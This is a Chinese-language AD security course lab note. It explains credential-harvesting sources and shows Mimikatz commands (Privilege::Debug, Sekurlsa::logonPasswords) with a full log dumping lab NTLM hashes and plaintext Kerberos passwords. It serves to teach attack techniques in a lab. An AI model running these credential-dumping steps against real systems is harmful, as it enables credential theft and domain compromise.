# NTUSTISC - AD Note - Lab(透過Mimikatz取得Local Admin的NTLM)
[TOC]
Lecture Video: [2022/05/04 AD 安全1](https://youtu.be/Cv2gNQkDM8Q?si=l1na5hFGpAPk6Uux&t=4257)
## Background
得到更高權限之後,會想要更多的密碼
* 密碼收集
* SAM.hive(Security Account Manager)
* Password Spraying(用猜的)
* GPO
* Where: `\\<domain>\SysVol\<domain>\Policie`,以本次實驗為例,就是放在`\\kuma.org\SYSVOL\kuma.org\Policies`,接下來就是隨機生成的`<UID>\Users\Scripts`和`<UID>\Machine\Scripts`,這兩個腳本是我們覺得重要的
* 記憶體(lsass)
* 為了獲取更多其他帳號密碼,嘗試逼近Domain Admin,可以使用Mimikatz獲取暫存憑證
* ==What is Mimikatz?==
>Mimikatz為一個強力的Windows提權工具,可以提升Process權限、注入Process讀取Process記憶體,可以直接從lsass中獲取當前登錄過系統用戶的帳號明文密碼。
>lsass是微軟Windows系統的安全機制它主要用於本地安全和登陸策略,通常我們在登陸系統時輸入密碼之後,密碼便會儲存在lsass內存中,經過其wdigest和tspkg兩個模塊調用後,對其使用可逆的算法進行加密並存儲在內存之中,而mimikatz正是通過對lsass的逆算獲取到明文密碼。
簡單說就是所有登入認證都交給lsass,所以他有所有人的認證憑證
* Download: [Mimikatz-github](https://github.com/gentilkiwi/mimikatz)
* How to use:
Mimikatz最新版本一共三個文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分為Win32位(多了一個mimilove.exe文件)和X64位
下載後解壓縮即可使用,裡面分為Win32和X64,Win32是針對Windows32位,而X64是針對64位作業系統,目前絕大部分作業系統為64位
* ==lsass.exe VS SAM==
SAM只會存取本地用戶的NTLM Hash,而lsass.exe是只要有存取過目前電腦的使用者都會被記錄,例如domain admin或是其他使用者利用smb連過來也會被lsass紀錄
## Lab
### ==透過Mimikatz取得Local Admin的NTLM==
1. Activate Mimikatz
進入`C:\tools\mimikatz_trunk\x64`右鍵以系統管理員身分執行mimikatz.exe(一定要用系統管理員才能執行提權的debug)
2. 起手式
```bash
mimikatz # Privilege::Debug
Privilege '20' OK
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # Sekurlsa::logonPasswords
```
:::spoiler Log Reuslt
```bash
Using 'mimikatz.log' for logfile : OK
mimikatz # Sekurlsa::logonPasswords
Authentication Id : 0 ; 23133312 (00000000:0160fc80)
Session : CachedInteractive from 1
User Name : Administrator
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/9/4 06:07:18
SID : S-1-5-21-306106713-2531972042-334329499-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : cf967ea9c9c0f9d58b79fdd040270648
tspkg :
wdigest :
* Username : Administrator
* Domain : kuma
* Password : (null)
kerberos :
* Username : Administrator
* Domain : KUMA.ORG
* Password : 1qaz@WSX3edc
ssp :
credman :
cloudap :
Authentication Id : 0 ; 20047794 (00000000:0131e7b2)
Session : CachedInteractive from 1
User Name : Administrator
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/9/4 10:19:22
SID : S-1-5-21-306106713-2531972042-334329499-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : cf967ea9c9c0f9d58b79fdd040270648
tspkg :
wdigest :
* Username : Administrator
* Domain : kuma
* Password : (null)
kerberos :
* Username : Administrator
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 16441076 (00000000:00fadef4)
Session : Interactive from 1
User Name : administrator
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/9/4 12:44:48
SID : S-1-5-21-306106713-2531972042-334329499-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : cf967ea9c9c0f9d58b79fdd040270648
tspkg :
wdigest :
* Username : Administrator
* Domain : kuma
* Password : (null)
kerberos :
* Username : administrator
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 14849757 (00000000:00e296dd)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2023/9/3 09:44:12
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1299130 (00000000:0013d2ba)
Session : Interactive from 1
User Name : bear
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/8/29 12:47:58
SID : S-1-5-21-306106713-2531972042-334329499-2101
msv :
[00000003] Primary
* Username : bear
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : 4057a0d0b94378dd03224e8b3d28a006
tspkg :
wdigest :
* Username : bear
* Domain : kuma
* Password : (null)
kerberos :
* Username : bear
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/8/29 12:40:42
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/8/29 12:40:39
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 70138 (00000000:000111fa)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 70109 (00000000:000111dd)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DESKTOP-G95U93T$
Domain : kuma
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : desktop-g95u93t$
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 47346 (00000000:0000b8f2)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 46297 (00000000:0000b4d9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 44132 (00000000:0000ac64)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/8/29 12:40:37
SID :
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DESKTOP-G95U93T$
Domain : kuma
Logon Server : (null)
Logon Time : 2023/8/29 12:40:37
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : desktop-g95u93t$
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
```
:::
可以看到這一份檔案比前面提到的SAM還要完整很多,用log的原因是他會把輸出dump下來,用熟悉的文字編輯器尋找有用的資訊比較方便,另外,==Privilege::Debug==的意思是跟windows取得debug lsass的權限
Sign in via Google
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Connect another wallet